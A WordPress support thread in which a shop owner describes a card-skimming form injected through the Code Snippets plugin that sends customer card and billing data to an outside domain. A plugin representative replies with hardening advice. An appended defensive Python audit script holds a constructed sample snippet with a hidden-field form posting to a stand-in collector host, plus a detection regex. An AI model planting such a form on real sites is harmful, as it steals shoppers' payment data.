Title: Malicious Code
Last modified: January 9, 2025

---

# Malicious Code

 *  Resolved [conors37](https://wordpress.org/support/users/conors37/)
 * (@conors37)
 * [1 year, 5 months ago](https://wordpress.org/support/topic/malicious-code-27/)
 * Hi,
 * I’m creating this topic to make your support team aware of this issue and also
   to urge anyone who sees this to check their code snippets for malicious code.
 * Yesterday a customer sent us a picture of our order received page. This is our
   page that displays the order summary to the customer after the payment has been
   processed. On this page there was a form injected at the top of the page prompting
   the user to input their card details again to confirm their purchase.
 * I placed the website in maintenance mode and inspected the form. The form contains
   the customer’s billing information, which is hidden. So if the customer were to
   submit the form, all their billing information and their card details are sent
   to the URL in the form which is dic.ngo. I’ve reported this domain to their registrar.
 * I discovered that malicious code was present in multiple code snippets. Our website’s
   security is stringent and something like this would usually be flagged but this
   was not. I’m not accusing Code Snippets of being responsible for this. I just
   want people to be aware of this. I would call this a sophisticated attack compared
   to most phishing attempts. They used the code snippet plugin to add the malicious
   code that injects the form so our website security was unaware.
 * Be careful out there people.
 * Conor

Viewing 1 replies (of 1 total)

 *  [pauserratgutierrez](https://wordpress.org/support/users/pauserratgutierrez/)
 * (@pauserratgutierrez)
 * [1 year, 4 months ago](https://wordpress.org/support/topic/malicious-code-27/#post-18235890)
 * Hi [@conors37](https://wordpress.org/support/users/conors37/),
 * Thank you for bringing this to our attention. We take security very seriously
   and understand your concerns regarding the malicious code injected into your 
   code snippets.
 * The Code Snippets plugin is a tool that allows users to add custom code to their
   WordPress sites. While the plugin itself doesn’t have any known vulnerabilities
   at this time, it’s possible for malicious actors to gain unauthorized access 
   to a site through other means and insert harmful code.
 * To enhance your site’s security, we recommend the following steps:
    1. **Review User Access**: Ensure that only trusted individuals have administrative
       access to your WordPress dashboard.
    2. **Update All Plugins and Themes**: Regularly updating all components of your
       site can help protect against known vulnerabilities.
    3. **Implement Security Measures**: Consider using security plugins that offer 
       features like malware scanning and firewall protection.
    4. **Monitor Code Snippets**: Regularly review your code snippets for any unauthorized
       changes or additions.
 * Best regards,
   Pau.
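
An added example, not part of the original thread or of the plugin's code: one way to automate the snippet review recommended above, by comparing each snippet against hashes recorded at the last manual review and flagging any `<form>` whose action points off-site. It assumes the snippets have been exported as id/code records; the host names, ids and snippet bodies are constructed placeholders.

```python
import hashlib
import re
from urllib.parse import urlparse

# action="..." inside a <form> tag, also when the quotes are backslash-escaped in PHP strings
FORM_ACTION = re.compile(r"""<form\b[^>]*?\baction\s*=\s*\\?["']([^"'\\]+)""", re.I)

def digest(code):
    return hashlib.sha256(code.encode("utf-8")).hexdigest()

def audit_snippets(snippets, site_host, baseline):
    """Return (snippet_id, reason) for changed snippets and for forms posting off-site."""
    findings = []
    for snip in snippets:
        sid, code = snip["id"], snip["code"]
        if baseline.get(sid) != digest(code):
            findings.append((sid, "new or modified since baseline"))
        for action in FORM_ACTION.findall(code):
            host = (urlparse(action).hostname or "").lower()  # relative actions have no host
            if host and host != site_host and not host.endswith("." + site_host):
                findings.append((sid, "form posts to external host " + host))
    return findings

# Constructed sample data: hosts, ids and snippet bodies are placeholders.
REVIEWED_1 = "add_filter('the_title', 'shop_title');"
REVIEWED_3 = """echo '<form method="get" action="/order-tracking/"><input name="order"></form>';"""
UNREVIEWED_2 = """add_action('wp_footer', function () {
    echo '<form method="post" action="https://collector.example/c">';
    echo '<input type="hidden" name="billing_email" value="">';
});"""

SITE_HOST = "shop.example"
BASELINE = {1: digest(REVIEWED_1), 3: digest(REVIEWED_3)}  # hashes taken at the last manual review
SNIPPETS = [
    {"id": 1, "code": REVIEWED_1},
    {"id": 2, "code": UNREVIEWED_2},
    {"id": 3, "code": REVIEWED_3},
]

if __name__ == "__main__":
    for sid, reason in audit_snippets(SNIPPETS, SITE_HOST, BASELINE):
        print(f"snippet {sid}: {reason}")
```

The baseline check catches any edit, including ones that contain no form at all; the form check is a narrower signal for the specific pattern reported in this thread.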
